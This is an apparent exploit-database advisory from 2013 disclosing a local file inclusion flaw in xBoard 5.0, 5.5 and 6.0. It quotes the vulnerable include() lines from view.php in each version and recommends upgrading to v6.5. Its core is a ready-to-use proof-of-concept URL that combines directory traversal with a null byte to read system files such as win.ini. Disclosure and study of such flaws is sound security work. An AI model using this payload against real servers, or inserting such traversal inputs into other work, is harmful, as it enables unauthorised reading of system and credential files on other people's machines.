?X-------------------------------------------------------------X
_____ _ _ _ _ _____ _____ _____ ___ _ _ _______ _______ ___________
|_ _| | | | \ | |_ _/ ___|_ _|/ _ \ | \ | | / __ \ \ / / ___ \ ___| ___ \
| | | | | | \| | | | \ `--. | | / /_\ \| \| | | / \/\ V /| |_/ / |__ | |_/ /
| | | | | | . ` | | | `--. \ | | | _ || . ` | | | \ / | ___ \ __|| /
| | | |_| | |\ |_| |_/\__/ /_| |_| | | || |\ | | \__/\ | | | |_/ / |___| |\ \
\_/ \___/\_| \_/\___/\____/ \___/\_| |_/\_| \_/ \____/ \_/ \____/\____/\_| \_|
X-------------------------------------------------------------X
[+] Author: TUNISIAN CYBER
[+] Exploit Title: xBoard 5.0/5.5/6.0 Local File Inclusion
[+] Date: 24-12-2013
[+] Category: WebApp
[+] Vendor:http://sourceforge.net/projects/xboard/
[+] Google Dork:
[+] Tested on: Win7 , ubuntu 13.04
########################################################################################
I/Vulnerable code: view.php
v5.0:
49: if (file_exists("$directory/$post.html"))
50: {
51: include("$directory/$post.html");
v5.5:
28: if (file_exists("$directory/$post.html"))
29: {
30: include("$directory/$post.html");
v6.0:
27: if (file_exists("$directory/$post.html"))
28: {
29: include("$directory/$post.html");
II/Exploit and p.0.c:
http://{host}/xboard/view.php?post=../../../../../../../../../../windows/win.ini%00
p.0.c: http://oi44.tinypic.com/2uxyaz9.jpg
III/Solution:
Upgrade to v6.5
./3nD
########################################################################################
Greets to: XMaXtn, N43il HacK3r, XtechSEt